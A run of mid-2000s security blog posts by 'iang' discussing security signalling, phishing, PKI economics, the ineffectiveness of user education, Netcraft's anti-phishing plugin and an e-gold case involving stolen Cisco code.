    So more kudos to the CSI for breaking out of the mold of us and them! It seems that common sense won over and Frank attended. He can be seen here in a photo op, confirming his ability to charm the ladies, and giving "us" yet another excuse to exclude him from our limited opportunities with "them" !


    Posted by iang at 08:59 AM | Comments (0) | TrackBack

    January 02, 2005

    Security Signalling - the market for Lemmings

    Adam continues to grind away at his problem: how to signal good security. It's a good question, as we know that the market for security is highly inefficient, some would say dysfunctional. E.g., we perceive that many security products are good but ignored, and others are bad but extraordinarily popular, and despite repeated evidence of breaches, en masse, users flock to it with lemming-like behaviour.

    I think a real part of this is that the underlying question of just what security really is remains unstudied. So, what is security? Or, in more formal economics terms, what is the product that is sold in the market for security?

    This is not such an easy question from an economist's point of view. It's a bit like the market for lemons, which was thought to be just anomalous and weird until some bright economist sat down and studied it. AFAIK, nobody's studied the market for security, although I admit to only having asked one economist, and his answer was "there's no definition for *that* product that I know of!"

    Let's give it a go. Here's the basic issue: security as a product lacks good testability. That is, when you purchase your standard security product, there is no easy way to show that it achieves its core goal, which is to secure you against the threat.

    Well, actually, that's not quite correct; there are obviously two sorts of security products, those that are testable and those that are not. Consider a gate that is meant to guard against dogs. You can install this in a fence, then watch the rabid canines try and beat against the gate. With a certain amount of confidence you can determine that the gate is secure against dogs.

    But, now consider a burglar alarm. You can also install it with about the same degree of effort. You can conduct the basic workability tests, same as a gate. One opens and goes click on closing; the other sets and resets, with beeping.

    But there the comparison gets into trouble, as once you've shown the burglar alarm to work, you still have no real way of determining that it achieves its goal. How do you know it stops burglars?

    The threat that is being addressed cannot be easily simulated. Yes, you can pretend to be a burglar, but non-burglars are pretty poor at that. Whereas one doesn't need to be a dog to pretend to be a dog, and do so well enough to test a gate.

    What then is one supposed to do? Hire a burglar? Well, let's try that: put an ad in the paper, or more digitally, hang around IRC and learn some NuWordz. And your test burglar gets in and ... does what? If he's a real burglar, he might tell you or he might just take the stuff. Or, both, it's not unreasonable to imagine a real burglar telling you *and* coming back a month later...

    Or he fails to get in. What does that tell you? Only that *that* burglar can't get in! Or that he's lying.

    Let's summarise. We have these characteristics in the market for security:

    Perhaps some examples might help. Consider a security product such as Microsoft Windows Operating System. Clearly they write it as well as they can, and then test it as much as they can afford. Yet, it always ships with bugs in it, and in time those bugs are exploited. So their testing - their simulated threats - is unsatisfactory. And their ability to arrange testing by real threats is limited by the inefficient market for blackhats (another topic in itself, but one beyond today's scope).

    Closer to (my) home, let's look at crypto protocols as a security product. We can see that it is fairly close as well: The simulated threat is the review by analysts, the open source cryptologists and cryptoplumbers that pore through the code and specs looking for weaknesses. Yet, it's expensive to purchase review of crypto, which is why so many people go open source and hope that someone finds it interesting enough. And, even when you can attract someone to review your code, it is never ever a complete review. It's just what they had time for; no amount of money buys a complete review of everything that is possible.

    And, if we were to have any luck in finding a real attacker, then it would only be by deploying the protocol in vast numbers of implementations or in a few implementations of such value that it would be worth his time to try and attack it. So, after crossing that barrier, we are probably rather ill-suited to watching for his arrival as a threat, simply due to the time and effort already undertaken to get that far. (E.g., the protocol designers are long since transferred to other duties.) And almost by default, the energy spent in cracking our protocol is an investment that can only be recouped by aggressive acquisition of assets on the breach.

    (Protocol design has always been known to have highly asymmetric characteristics in security. It is for this reason that the last few years have shown a big interest in provability of security statements. But this is a relatively young art; if it is anything like the provability of coding that I did at University it can be summarised as "showing great potential" for many decades to come.)

    Having established these characteristics, a whole bunch of questions are raised. What then can we predict about the market for Lemmings? (Or is it the market for Pied Pipers?) If we cannot determine its efficacy as a product, why is it that we continue to buy? What is it that we can do to make this market respond more ... responsibly? And finally, we might actually get a chance to address Adam's original question, to whit, how do we go about signalling security, anyway?

    Lucky we have a year ahead of us to muse on these issues.

    Posted by iang at 12:24 AM | Comments (7) | TrackBack

    December 30, 2004

    Netcraft breaks ranks and points the crooked black claw of doom at the SSL security model

    In a show of remarkable adeptness, Netcraft have released an anti-phishing plugin for IE. Firefox is coming, so they say. This was exciting enough to make it on Slashdot, as David at Mozilla pointed out to me.

    There are now dozens of plugins floating around designed to address phishing. (If that doesn't say this is a browser issue, I don't know what will. Yes, the phish are growing wings and trialling cell phones, pagers and any other thing they can get at, but the main casting action is still a browser game.) The trustbar one is my favourite, although it doesn't work on my Firefox.

    So, what about Netcraft? Well, it's quite inspired. Netcraft have this big database of all the webservers in existance, and quite a few that are not. The plugin simply pops on over to the Netcraft database and asks for the vital stats on that website.

    Well, hey ho! Why didn't we think of that?

    There's a very good reason why not. Several in fact. Firstly, this puts Netcraft into your browser in an important position; if they succeed at this, then they have entre into the user's hearts and minds. That means some sort of advertising revenue model, etc etc, as clearly permitted in their licence. Or worse, like their own little spyware programs which may or may not be permitted under their Privacy clause.

    (So one reason we didn't think of that is because we all hate advertising models ... just so we're clear on that point!)

    But more interesting is that Netcraft is a player in the security industry. At least, they are a collector of CA and SSL statistics, and their reports sell for mighty big bucks. So one might expect them to pay attention to those suggestions that supported the SSL industry, like the ones that I frequently ... propose.

    But, no. What they have done is completely bypassed the SSL security model and crafted a new one based on a database of known information. If one has followed the CA security debate, it bears a stunning similarity to the notions of what we'd do if we were attempting to fix the model. It's the endgame: to fix the revocation problem you add online checking which means you don't need the CAs any more.

    Boom. If Netcraft succeeds in this approach (and there is no reason why others can't copy it!) then we don't need CAs any more. Well, that's not quite true, what this implies is that Netcraft just became a CA. But, they are a CA according to their rules, not those historical artifacts popularised by accounting entities such as WebTrust.

    So it's another way to become a CA: give away the service for free, acquire the user base, and figure out how to charge for it later. A classic dotcom boom strategy, right? Bypass the browser policy completely because it is struggling under the weight of the WebTrust legacy, and the security wood can't be seen for the policy trees.

    (Now, some will be scratching their heads about the apparent lack of a cert in the plugin. Don't worry, that's an implementation detail. They can add that later, for now they offer a free certificate service with no cert. Think of the upgrade potential here. The important thing is to see if this works as a *business* model first.)

    So this takes aim at the very group that they sell reports to. Of course, the people who want to buy reports on certificate use are the CAs, and their various suppliers of CA toolkits.

    That's why it's a significant event. (And another reason why we didn't think of it!)

    Netcraft have obviously worked out several things: the CAs are powerless to do anything about phishing, and that's a much bigger revenue stream than a few boring reports. Further, the security model is stagnant at best and a crock at worst, so why not try something new? And, the browser manufacturers aren't playing their part, with narry a one admitting that the problem is in their patch. So their users are also vulnerable to a takeover by someone with some marketing and security sense.

    Well done Netcraft, is all I can say! Which is to say that I have no idea whether the plugin itself will work as advertised. But the concept, now, that's grand!

    Posted by iang at 02:26 PM | Comments (2) | TrackBack

    December 29, 2004

    Simple Tips on Computer Security

    Recently, it's become fashionable to write an article on how to protect yourself from all the malware, phishing, spyware, viruses, spam, espionage and bad disk drives out there. Here's some: [IBM], [Schneier], [GetLuky].

    Unfortunately, most of them go over the heads of ordinary users, and many of them challenge even experienced users! So I've been keeping my eye out for succinct tips, the sort for car owners who don't know what an oil change is. I have two which I've posted here before, being Buy a Mac and download FireFox. Both good things, but I feel the lack of any good tip for phishing; there just isn't a good way to deal with that yet.

    There they are, sitting in a box in the right of the blog.

    1. Buy a Mac - Uses BSD as its secure operating system...
    2. Download FireFox - Re-engineered for security...
    3. Check name of site - written on bottom right of FireFox, next to padlock...
    4. Write Passwords Down - In a safe place...

    People do ask me from time to time what to do. I feel mightily embarrassed because I have no Windows machine, but I also find myself empathising with ordinary users who ask what it means to upgrade the software! So my tips are designed for people who know not what SP2 means.

    Let me know your suggestions, but be warned: they'd better be very very simple. Coz that's all that counts for the user.

    Posted by iang at 05:47 PM | Comments (15) | TrackBack

    December 27, 2004

    User education: worse than useless

    Cypherpunk askes a) why has phishing gone beyond "don't click that link" and b) why we can't educate the users?

    A lot of what I wrote in The Year of the Snail is apropos to that first question. In economic terms, we would say that Phishing is now institutionalised. In more general parlance, and in criminal terms, it would be better expressed as organised crime. Phishing is now a factory approach, if you like, with lots of different phases, and different actors all working together. Which is to say that it is now very serious, it's not a simple net bug like viruses or spam, and that generally means telling people to avoid it will be inadequate.

    We can look at the second question much more scientifically. The notion of teaching people not to click has been tried for so long now that we have a lot of experience just how effective the approach of 'user education' is. For example, see the research by Ye and Smith and also Herzberg and Gbara, who tested users in user interface security questions. Bottom line: education is worse than useless.

    Users defy every effort to be educated. They use common sense and their own eyes: and they click a link that has been sent to them. If they didn't do that, then we wouldn't have all these darn viruses and all this phishing! But viruses spread, and users get phished, so we know that they don't follow any instructions that we might give them.

    So why does this silly notion of user education persist? Why is every security expert out there recommending that 'users be educated' with not the least blush of embarrassment at the inadequacy of their words?

    I think it's a case of complexity, feedback and some fairly normal cognitive dissonance. It tends to work like this: a security expert obviously receives his training from some place, which we'll call received wisdom. Let's call him Trent, because he is trusted. He then goes out and employs this wisdom on users. Our user, Alice, hears the words of "don't click that link" and because of the presence of Trent, our trusted teacher, she decides to follow this advice.

    Then, Alice goes out into the world and ... well, does productive work, something us Internet geeks know very little about. In her office every day she dutifully does not click, until she notices two thing. Firstly, everyone else is clicking away like mad, and indeed sending lots of Word documents and photos of kids and those corny jokes that swill around the office environment.

    And, secondly, she notices that nobody else seems to suffer. So she starts clicking and enjoying the life that Microsoft taught her: this stuff is good, click here to see my special message. It all becomes a blur and some time later she has totally forgotten *why* she shouldn't click, and cannot work out what the problem is anyway.

    (Then of course a virus sweeps the whole office into the seas ...)

    So what's going on here? Well, several factors.

    1. Trent successfully educated Alice. So he runs around with the notion that user education is a fine tool and it works A-OK! Yes, he believes that we can achieve results this way. He promotes user education as the answer to our security needs.
    2. Alice more or less left her education session successfully educated. But it doesn't last, because everyone else doesn't do it, and she can't see the sense in it anyway. That is to say, in systems theory, Alice cannot close the loop. She cannot see the action she is asked for as causing any additional security. As there is no reinforcing feedback, after a while it breaks, and never gets renewed.
    3. Trent only managed to impress a small group of users. The vast majority of users out there however are 'the masses'. Many people don't actually know any computer experts, and they go into a retail store like Walmart to buy their computer. They have enough trouble coping with the fact that the parts need to be connected together in order to work ... and esoteric notions of clicks and security and viruses just go right over their heads.
    4. When a virus or other plague like phishing does sweep through and wash the users into the sea, it's very unclear who to blame. Was it the bank? Was it Microsoft? Was it Sally-Anne who clicked on too many links? Or the Simon the systems administrator who installed a new Virus filter? Or, maybe it was Hamisch the terrible eastern European hacker again? Or ... , or ..... Just exactly why it happens is totally difficult to determine, and *that* means that the distance between the crime and any adequate defences is so great that there is no real feedback to reinforce the defences. Why defend when it is not doing anything?
    5. If only a small subset of users are 'educated' this achieves nothing other than the minor effect of them potentially being protected. That's because if a virus sweeps through, we all suffer, even if we have protected ourselves. Yet, to stop the virus, we *all* have to follow the discipline. So we have a sort of free-rider problem: we have no way to make sure that all the users are 'educated' and thus there is no real incentive for anyone to educate.
    6. Getting back to Trent, of course, he is secure. Everyone reading this blog is secure. Unless they are real users, in which case they didn't understand a word of it and didn't get this far (sorry about that!). So for Trent and our sort of person, we don't see the problem because it doesn't directly effect us. We are shut off from the real world of users.

    Hence, cognitive dissonance. In this case, the security industry has an unfounded view that education is a critical component of a security system. Out in the real world, though, that doesn't happen. Not only doesn't the education happen, but when it does happen, it isn't effective.

    Perhaps a better way to look at this is to use Microsoft as a barometer. What they do is generally what the user asks for. The user wants to click on mail coming in, so that's what Microsoft gives them, regardless of the wider consequences.

    And, the user does not want to be educated, so eventually, Microsoft took away that awful bloody paperclip. Which leaves us with the lesson of inbuilt, intiutive, as-delivered security. If you want a system to be secure, you have to build it so that it is so intiutively to the user. Each obvious action should be secure. And you have to deliver it so that it operates out of the box, securely. (Mozilla have recently made some important steps in this direction by establishing a policy of delivery to the average user. It's a first welcome step which will eventually lead them to delivering a secure browser.)

    If these steps aren't taken, then it doesn't help to say to the user, don't click there. Which brings me to the last point: why is user education *worse* than useless? Well, every time a so-called security expert calls for the users to be educated, he is avoiding the real problems, and he is shifting the blame away from the software to the users. In this sense, he is the problem, and until we can get him out of the way, we can't start thinking of the solutions.

    Posted by iang at 02:17 PM | Comments (4) | TrackBack

    December 19, 2004

    Security Coding Best Practices - Java adds yet another little check, and boom...

    Over on Adam's blog he has a developing theme on 'security signalling.' He asks whether a code-checking program like RATS would signal to the world that a product is a good secure product? It's an important question, and if you need a reason, consider this: when/if Microsoft gets done rewriting its current poisoned chalice of an operating system, how is it going to tell the world that it's done the job?

    Last night I had occasion to feel the wrath of such a check, so can now respond with at least one sample point. The story starts earlier in the week, when I reinstalled my laptop with FreeBSD 5.3. This was quite a massive change for me, up from 4.9 which had slowly been dying under the imposition of too many forward-compatible ports. It also of course retriggered a reinstall of languages, but this should have been no trouble as I already had jdk1.4.2 installed, and that was still the current. (Well, I say no trouble ... as Java is "unsupported" on FreeBSD, mostly because of Sun's control freak policies creating a "write once, run twice" environment.)

    Anyway, my code went crazy (*). A minor change in the compiler checking brought out a squillion errors. Four hours later, and I'd edited about 100 files and changed about 500 lines of code. My eyes were glazed, my brain frizzled and the only cognitive capability I had left was to open beers and dispose of them.

    Now, this morning, I can look at the effect, hopefully in the cold hard light of a northern winter's sunny day. At least for another hour.

    It's security code (hard crypto payments) so am I more secure? No. Probably actually less secure, because the changes were so many and so trivial that the robot masquerading as me made them without thinking; just trying to get the darn thing to compile so I could get back to my life.

    So one answer to whether the RATS proposal could make any difference is that it could make things worse: If thrown at a project, the rush to get the RATS thing to come out clean could cause more harm than good.

    Which is a once-off effect or a singularity. But what if you didn't have a singularity, and you instead just had "good coding checks" all the time?

    Well. This is just like the old days of C where some shops used Lint and others didn't. (Lint was an old tool for cleaning out "fluff" from your C code.) Unfortunately there wasn't enough of a real discernable difference that I ever saw to be able to conclude that a Lint-using shop was more secure.

    What one could tell is that the Lint-using shop had some coding practices in place. Were they good practices? Sometimes, yes. Maybe. On the whole Lint did good stuff, but it also did some stupid things, and the net result was that either you used Lint or you were careful, and not using Lint was either a signal that you were careful and knew more, or you weren't careful, and knew less; whereas using Lint was a signal that you didn't know enough to be careful, but at least you knew that!

    We could debate for years on which is better.

    As an example of this, at a tender age, I rewrote the infamous strcpy(3) set of routines to eliminate buffer overflows. Doing so cost me a day or two of coding. But from there on in, I never had a buffer overflow, and my code was easy to audit. Massive benefit, and I preferred that to using Lint, simply because *I* knew what I was doing was much safer.

    But how to convince the world of that? I don't know ... still an open question. But, I'm glad Adam has brought up the question, and I have the chance to say "that won't work," because the answer is probably worth an extra percentage point on Microsoft's market cap, in a couple of years, maybe.


    * The code is WebFunds which is about 100kloc (kilo-lines-of-code) chock full of hard crypto, RTGS payments and various other financial cryptography applications like secure net storage and secure chat.

    Posted by iang at 09:31 AM | Comments (6) | TrackBack

    December 09, 2004

    PKI's mission: sell certs or die in the attempt!

    Back in the early 90s, some Bright Spark had the idea that if a certificate authority could sign a certificate, and this certificate could be used to secure logins, payments, emails and ... well, everything, then obviously everyone would want one. And everyone was a lot of people, even back in the days before mainstream Internet.

    There was a slight problem, though. The certificate wasn't really the only way to do things. In fact, it was one of the poorer ways to do things, because of that pesky complexity argument. But this didn't present an unsurmountable challenge to our Mr. B.S., as crypto and security are devilish complex things, *however* you do them.

    All that was needed was a threat to hang the hat of certificate security on, and the rest could be written into history. This bogeyman turned out to be the wicked thief of credit cards, who would conduct a thing of great evil called a Man-In-The-Middle attack on poor innocent Internet consumers. This threat (cut to images of virginal shoppers tied to the rails before the oncoming train of rapacious gangsters) made the whole lot hang together, cohesively enough to fool all but the most skeptical security experts.

    And so PKI was born. Public Key Infrastructure involved lots of crypto, lots of complexity, lots of software, and of course, oodles and oodles of certs, all for sale. Boom! Literally, at least in stock market terms, as certificate sellers went through the Internet IPO roof.

    Their mission was to sell certs or die in the attempt, and they did. By the end of the dotcom boom, all but one of them were smoking carcasses. The one that survived cleverly used its stock market money to buy some businesses with real cash flow. But even it danced with stock prices that were 1-2% of its peak. Now it's up in the 10% range.

    Unfortunately, even though the PKI companies died exotic and flashy deaths, the mission did not. Now, one insider has crawled out from the ashes to write an anonymous article that isn't exactly waving a white flag. As he reveals his inner dreams, it's stunning to realise that this insider *still* believes that PKI can do it, even when he admits that the mission was to sell certs. How pervasive a marketing myth is that?

    Anyways, here's the link. For those students of Internet security, you be the judge: how much of the following makes sense when you consider their mission was to sell certs? How much of it makes sense if you take away that mission?


    Revenge of the PKI Nerds

    Wherein a very patient CSO hatches a plan to revive a technology thought to be dead

    BY ANONYMOUS

    I recently noticed a curious phenomenon. Public Key Infrastructure, once rumored to be dead, is making a comeback. Several high-profile institutions are now deploying a technology that I assumed had been extinct since the dot-bomb era. It's sort of technology's version of the coelacanth. This was a fish that was assumed to have been extinct for hundreds of thousands of years and then-bam!-one turns up in a fisherman's net off the coast of Madagascar.

    I admit I have a certain fondness for Public Key Infrastructure, or PKI as it is commonly known-at least that is the three-letter version. PKI is commonly described using choice four-letter words as well. That's because it came into favor-and just as ingloriously fell out of it-with the boom of the '90s.

    I should know, because I cut my security teeth on the bleeding edge of PKI. In 1992, I took a position as the director of electronic commerce with a company that sought to deploy a global certificate authority (CA) that would issue the digital certificates used to process PKI. Under our plan, all other CAs would be subordinate to us, and we would sit atop a giant pyramid scheme raking in monopoly profits by charging pennies on all the billions of e-commerce transactions around the world.

    The only problem was that other PKI companies were busy scheming with their own plans to take over the e-commerce world. While we were plotting against each other, we forgot to actually deploy the technology. After a few years of hand waving, PowerPoint presentations and whiteboard discussions, investors began demanding that we start earning our keep by making a profit. Silly realists!

    ....
    http://www.csoonline.com/read/120104/undercover.html

    Posted by iang at 04:59 PM | Comments (8) | TrackBack

    December 08, 2004

    2006, and beyond...

    Over at EmergentChaos, Adam asked what happens when "the Snail" gets 10x worse? I need several cups of coffee to work that one out! My first impressions were that ... well, it gets worse, dunnit! which is just an excuse for not thinking about the question.

    OK, so gallons of coffee and a week later, what is the natural break on the shift in the security marketplace? This is a systems theory (or "systemics" as it is known) question. Hereafter follows a rant on where it might go.

    (Unfortunately, it's a bit shambolic. Sorry about that.)

    A lot of ordinary users (right now) are investigating ways to limit their involvement with Windows due to repeated disasters with their PCs. This is the the first limiting factor on the damage: as people stop using PCs on a casual basis, they switch to using them on a "must use" basis.

    (Downloading Firefox is the easy fix and I'll say no more about it.) Some of those - retail users - will switch to Macs, and we can guess that Mac might well double its market share over the next couple of years. A lot of others - development users and poorer/developing countries - will switch to the open source Unix alternates like Linux/BSD. So those guys will have a few good years of steady growth too.

    Microsoft will withdraw from the weaker marketplaces. So we have already seen them pull out of supporting older versions, and we will see them back off from trying to fight Firefox too hard (they can always win that back later on). But it will maintain its core. It will fight tooth and nail to protect two things: the Office products, and the basic windows platform.

    To do that, the bottom line is that they probably need to rewrite large chunks of their stuff. Hence the need to withdraw from marginal areas in order to concentrate on protecting that which is core, so as to concentrate efforts. So we'll see a period characterised by no growth or negative growth by Microsoft, during which the alternates will reach a stable significant percentage. But, Microsoft will come back, and this time with a more secure platform. My guess is that it will take them 2 years, but that's because everything of that size takes that long.

    (Note that this negative market growth will be accompanied by an increase in revenues for Microsoft as companies are forced to upgrade to the latest releases in order to maintain some semblance of security. This is the perversity known as the cash cow: as the life cycle ends, the cash goes up.)

    I'd go out on a limb here and predict that in 2 years, Microsoft will still control about half of the desk top market, down from about 90% today.

    There are alternates outside the "PC" mold. More people will move to PDAs/cellular/mobile phones for smaller apps like contact and communications. Pushing this move also is the effect we've all wondered about for a decade now: spam. As spam grows and grows, email becomes worse and worse. Already there is a generation of Internet users that simply do not use email: the teenagers. They are chat users and phone users.

    It's no longer the grannies who don't use email, it is now the middle aged tech groupies (us) who are feeling more and more isolated. Email is dying. Or, at least, it is going the way of the telegram, that slow clunky way in which we send rare messages like birthday, wedding and funderal notices. People who sell email-based product rarely agree with this, but I see it on every wall that has writing on it [1] [2].

    But, I hear you say, chat and phones are also subject to all of the same attacks that are going to do Microsoft and the Internet so much damage! Yes, it's true, they are subject to those attacks, but they are not going to be damaged in the same way. There are two reasons for this.

    Chat users are much much more comfortable with many many identities. In the world of instant messaging, Nyms are king and queen and all the other members of the royal family at the same time. The same goes for the mobile phone world; there has been a seismic shift in that world over to prepaid billing, which also means that an identity that is duff or a phone that is duff can simply be disposed of, and a new one set up. Some people I know go through phones and SIMs on a monthly basis.

    Further, unlike email, there are multiple competing systems for both the phone platform and the IM platform, so we have a competition of technologies. We never had that in email, because we had one standard and nobody really cared to compete; but this time, as hackers hit, different technologies can experiment with different solutions to the cracks in different ways. The one that wins will attract a few percentage points of market share until the solution is copied. So the result of this is that the much lauded standardisation of email and the lack of competition in its basic technical operability is one of the things that will eventually kill it off.

    In summary so far; email is dying, chat is king, queen, and anyone you want to be, and your mobile/cellular is your pre-paid primary communications and management device.

    What else? Well, those who want email will have to pay *more* for it, because they will be the shrinking few who consume all the bandwidth with their spam. Also, the p2p space will save us from the identity crisis by inventing the next wave of commerce based on the nym. Which means that we can write off the Hollywood block buster for now.

    Shambolic, isn't it!

    [1] "Scammers Exploit DomainKeys Anti-phishing Weapon"
    http://story.news.yahoo.com/news?tmpl=story2&u=/zd/20041129/tc_zd/139951
    [2] "Will 2005 be the year of the unanswered e-mail message?"
    http://www.iht.com/bin/print_ipub.php?file=/articles/2004/12/06/business/netfraud.html

    Posted by iang at 08:45 AM | Comments (5) | TrackBack

    December 07, 2004

    Microsoft proceeds with strategic withdrawal

    In the military classroom, we teach 4 phases of war, one of which is "Withdrawal" (the others are Attack, Advance, Defence). One of the reasons for withdrawing is that the terrain cannot be defended, and thus we withdraw to terrain that can be defended. It's all fairly common sense stuff, but we are up against an inbuilt fear in all politicians and not a few soldiers that withdrawal is retreat and retreat is failure.

    Sometimes it is necessary to give up ground. Microsoft are now in that position. They are over extended on platforms, and need to back away from support of all older versions of the OS, if they are to have any chance of fielding a secure OS in the next couple of years. More evidence of this withdrawal is now coming to light:

    http://www.eweek.com/article2/0,1759,1736395,00.asp
    http://www.techworld.com/opsys/news/index.cfm?NewsID=2760

    These two articles discuss the withdrawal of support from various products, for security reasons. For Microsoft, the defensable terrain is Windows XP. Or, at least, that's their strategy!

    Posted by iang at 04:33 PM | Comments (1) | TrackBack

    November 05, 2004

    e-gold to track Cisco extortioner

    In line with my last post about using payment systems to stupidly commit crimes, here's what's happening over in the hacker world. In brief, some thief is trying to sell some Cisco source code he has stolen, and decided to use e-gold to get the payout. Oops. Even though e-gold has a reputation for being a den of scammers, any given payment can be traced from woe to go. All you have to do is convince the Issuer to do that, and this case, e-gold has a widely known policy of accepting any court order for such work.

    The sad thing about these sorts of crooks and crimes is that we have to wait until they've evolved by self destruction to find out the really interesting ways to crack a payment system.


    E-gold Tracks Cisco Code Thief
    November 5, 2004 By Michael Myser

    The electronic currency site that the Source Code Club said it will use to accept payment for Cisco Systems Inc.'s firewall source code is confident it can track down the perpetrators.

    Dr. Douglas Jackson, chairman of E-gold Ltd., which runs www.e-gold.com, said the company is already monitoring accounts it believes belong to the Source Code Club, and there has been no activity to date. ADVERTISEMENT

    "We've got a pretty good shot at getting them in our system," said Jackson, adding that the company formally investigates 70 to 80 criminal activities a year and has been able to determine the true identity of users in every case.

    On Monday, a member of the Source Code Club posted on a Usenet group that the group is selling the PIX 6.3.1 firewall firmware for $24,000, and buyers can purchase anonymously using e-mail, PGP keys and e-gold.com, which doesn't confirm identities of its users.

    PointerClick here to read more about the sale of Cisco code.

    "Bad guys think they can cover their tracks in our system, but they discover otherwise when it comes to an actual investigation," said Jackson.

    The purpose of the e-gold system, which is based on 1.86 metric tons of gold worth the equivalent of roughly $25 million, is to guarantee immediate payment, avoid market fluctuations and defaults, and ease transactions across borders and currencies. There is no credit line, and payments can only be made if covered by the amount in the account. Like the Federal Reserve, there is a finite value in the system. There are currently 1.5 million accounts at e-gold.com, 175,000 of those Jackson considers "active."

    eWEEK.com Special Report: Internet Security To have value, or e-gold, in an account, users must receive a payment in e-gold. Often, new account holders will pay cash to existing account holders in return for e-gold. Or, in the case of SCC, they will receive payment for a service.

    The only way to cash out of the system is to pay another party for a service or cash trade, which Jackson said creates an increasingly traceable web of activity.

    He did offer a caveat, however: "There is always the risk that they are clever enough to figure out an angle for offloading their e-gold in a way that leads to a dead end, but that tends to be much more difficult than most bad guys think."

    This is all assuming the SCC actually receives a payment, or even has the source code in the first place.

    PointerDavid Coursey says securing source code must be a priority. Read about it here.

    It's the ultimate buyer beware-the code could be made up, tampered with or may not exist. And because the transaction through e-gold is instantaneous and guaranteed, there is no way for the buyer to back out.

    Next Page: Just a publicity stunt?

    Dave Hawkins, technical support engineer with Radware Inc. in Mahwah, N.J., believes SCC is merely executing a publicity stunt.

    "If they had such real code, it's more likely they would have sold it in underground forums to legitimate hackers rather than broadcasting the sale on Usenet," he said. "Anyone who did have the actual code would probably keep it secret, examining it to build private exploits. By selling it, it could find its way into the public, and all those juicy vulnerabilities [would] vanish in the next version."

    PointerFor insights on security coverage around the Web, check out eWEEK.com Security Center Editor Larry Seltzer's Weblog.

    "There's really no way to tell if this is legitimate," said Russ Cooper, senior scientist with security firm TruSecure Corp. of Herndon, Va. Cooper, however, believes there may be a market for it nonetheless. By posting publicly, SCC is able to get the attention of criminal entities they otherwise might not reach.

    "It's advertising from one extortion team to another extortion team," he said. "These DDOS [distributed denial of service] extortionists, who are trying to get betting sites no doubt would like to have more ways to do that."

    PointerCheck out eWEEK.com's Security Center for the latest security news, reviews and analysis.

    Posted by iang at 11:38 AM | Comments (1) | TrackBack

    October 28, 2004

    Encrypt everything...

    AlertBox, the soapbox of one Jakob Nielsen, has had enough with nonsense security prescriptions. Its 25th October entry says:

    "Internet scams cannot be thwarted by placing the burden on users to defend themselves at all times. Beleaguered users need protection, and the technology must change to provide this."

    Sacrilege! Infamy! How can this rebel break ranks to suggest anything other than selling more crypto and certs and solutions to the users?

    Yet, others agree. Cory Doctorow says Nielsen is cranky, but educating the users is not going to solve security issues, and "our tools conspire against us to make us less secure...." Mitch Wagner agrees, saying that "much security is also too complicated for most users to understand."

    And they all three agree on Nielsen's first recommendation:

    "Encrypt all information at all times, except when it's displayed on the screen. In particular, never send plaintext email or other information across the Internet: anything that leaves your machine should be encrypted."

    Welcome to the movement.

    Posted by iang at 08:32 AM | Comments (3) | TrackBack

    October 23, 2004

    Security Signalling - sucking on the lemon

    Over on Adam's blog, he asks the question, how do we signal security? Have a read of that if you need to catch up on what is meant by signalling, and what the market for lemons is.

    It's a probing question. In fact, it goes right to the heart of security's dysfunctionalism. In fact, I don't think I can answer the question. But, glutton for punishment that I am, here's some thoughts.

    Signalling that "our stuff is secure" is fairly routine. As Adam suggests, we write blogs and thus establish a reputation that could be blackened if our efforts were not secure. Also, we participate in security forums, and pontificate on matters deep and cryptographic. We write papers, and we write stuff that we claim is secure. We publish our code in open source form. (Some say that's an essential signal, but it only makes a difference if anybody reads it with the view to checking the security. In practice, that simply doesn't happen often enough to matter in security terms, but at least we took the risk.)

    All that amounts to us saying we grow peaches, nothing more. Then there are standards. I've employed OpenPGP for this purpose, primarily, but we've also used x.509. Also, it's fairly routine to signal our security by stating our algorithms. We use SHA1, triple DES, DSA, RSA, and I'm now moving over to AES. All wonderful acronyms that few understand, but many know that they are the "safe" ones.

    Listing algorithms also points out the paucity of that signal: it still leaves aside how well you use them! For imponderable example, DES used in "ECB mode" achieves one result, whereas in "CBC mode" achieves a different result. How many know the difference? It's not a great signal, if it is so easy to confuse as that.

    So the next level of signalling is to use packages of algorithms. The most famous of these are PGP for email, SSL for browsing, and SSH for Unix administration. How strong are these? Again, it seems to come down to "when used wisely, they are good." Which doesn't imply that the use of them is in any way wise, and doesn't imply that their choice leads to security.

    SSL in particular seems to have become a watchword for security, so much so that I can pretty much guarantee that I can start an argument by saying "I don't use SSL because it doesn't add anything to our security model." From my point of view, I'm signalling that I have thought about security, but from the listener's point of view, only a pagan would so defile the brand of SSL.

    Brand is very important, and can be a very powerful signal. We all wish we could be the one big name in peach valley, but only a few companies or things have the brand of security. SSL is one, as above. IBM is another. Other companies would like to have it (Microsoft, Verisign, Sun) but for one reason or another they have failed to establish that particular brand.

    So what is left? It would appear that there are few positive signals that work, if only because any positive signal that arises gets quickly swamped by the masses of companies lining up for placebo security sales. Yes, everyone knows enough to say "we do AES, we recommend SSL, and we can partner with IBM." So these are not good signals as they are too easy to copy.

    Then there are negative signals: I haven't been hacked yet. But this again is hard to prove. How do we know that you haven't been? How do you know? I know one particular company that ran around the world telling everyone that they were the toppest around in security, and all the other security people knew nothing. (Even I was fooled.) Then they were hacked, apparently lost half a mil in gold, and it turned out that the only security was in the minds of the founders. But they kept that bit quiet, so everyone still thinks they are secure...

    "I've been audited as unhackable" might be a security signal. But, again, audit companies can be purchased to say whatever is desired; I know of a popular company that secures the planet with its software (or, would like to) that did exactly that - bought an audit that said it was secure. So that's another dead signal.

    What's left may well be that of "I'm being attacked." That is, right now, there's a hacker trying to crack my security. And I haven't lost out yet.

    That might seem like sucking on a lemon to see if it is sour, but play the game for a moment. If instead of keeping quiet about the hack attacks, I reported the daily crack attempts, and the losses experienced (zero for now), that indicates that some smart cookie has not yet managed to break my security. If I keep reporting that, every day or every month, then when I do get hacked - when my wonderful security product gets trashed and my digital dollars are winging it to digital Brazil - I'm faced with a choice:

    Tell the truth, stop reporting, or lie.

    If I stop reporting my hacks, it will be noticed by my no longer adoring public. Worse, if I lie, there will be at least two people who know it, and probably many more before the day is out. And my security product won't last if I've been shown to lie about its security.

    Telling the truth is the only decent result of that game, and that then forces me to deal with my own negative signal. Which results in a positive signal - I get bad results and I deal with them. The alternates become signals that something is wrong, so anyway out, sucking on the lemon will eventually result in a signal as to how secure my product is.

    Posted by iang at 11:40 AM | Comments (1) | TrackBack

    October 09, 2004

    SANS - top 20 solutions confirms no solution for phishing yet!

    Reading the new SANS list of top 20 vulnerabilities leaves one distinctly uncomfortable. It's not that it is conveniently sliced into top 10s for Unix and Microsoft Windows, I see that as a practical issue when so much of the world is split so diametrically.

